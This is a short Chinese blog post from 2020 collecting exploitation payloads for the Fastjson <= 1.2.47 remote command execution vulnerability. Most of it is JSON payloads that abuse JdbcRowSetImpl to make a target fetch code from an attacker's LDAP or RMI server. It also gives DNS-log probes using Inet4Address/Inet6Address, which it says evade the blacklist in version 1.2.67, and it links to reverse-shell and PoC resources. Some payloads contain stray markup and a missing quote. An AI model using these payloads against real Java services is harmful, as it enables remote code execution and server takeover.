Fastjson <= 1.2.47 远程命令执行漏洞利用工具及方法记录

payload

rmi://ldap:// 可以切换尝试。

param={
    "@type": "java.lang.Class",
    br / > "a": {
        "@type": "java.lang.Class",
        "val": "com.sun.rowset.JdbcRowSetImpl"
        "@type": "com.sun.rowset.JdbcRowSetImpl",
        br / >
    },
    "b": {
        "@type": "com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName": "ldap://your ip/",
        "autoCommit": true
    }
}

param={
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://your ip/",
        "autoCommit":true
    }
}

param={"orderNo":"B200414195915053000","partnerOrderNo":"DC200414593341","x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://your ip/","autoCommit":true}}

param={"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://your ip/","autoCommit":true}}}

# JNDI 注入
param={"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://your ip/","autoCommit":true}
param={"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://your ip/,"autoCommit":true}


# DNS log
param={"@type":"java.net.InetAddress","val":"example.com"}

可以通过 dns log 的方式得知漏洞是否存在了

利用java.net.Inet[4|6]Address

很早之前有一个方法是使用java.net.InetAddress类,现在这个类已经列入黑名单。然而在翻阅fastjson最新版源码(v1.2.67)时,发现两个类没有在黑名单中,于是可以构造了如下payload,即可使fastjson进行DNS解析。下面以java.net.Inet4Address为例分析构造原理。

{"@type":"java.net.Inet4Address","val":"dnslog"}
{"@type":"java.net.Inet6Address","val":"dnslog"}

参考

反弹shell
https://blog.csdn.net/Jiajiajiang_/article/details/103255659

复现pyload
https://blog.51cto.com/13770310/2425330?source=dra

靶场
https://vulhub.org/#/environments/fastjson/1.2.24-rce/

教程
https://github.com/shengqi158/fastjson-remote-code-execute-poc

posted on 2020-04-15 15:01  Mysticbinary  阅读(2356)  评论(0编辑  收藏  举报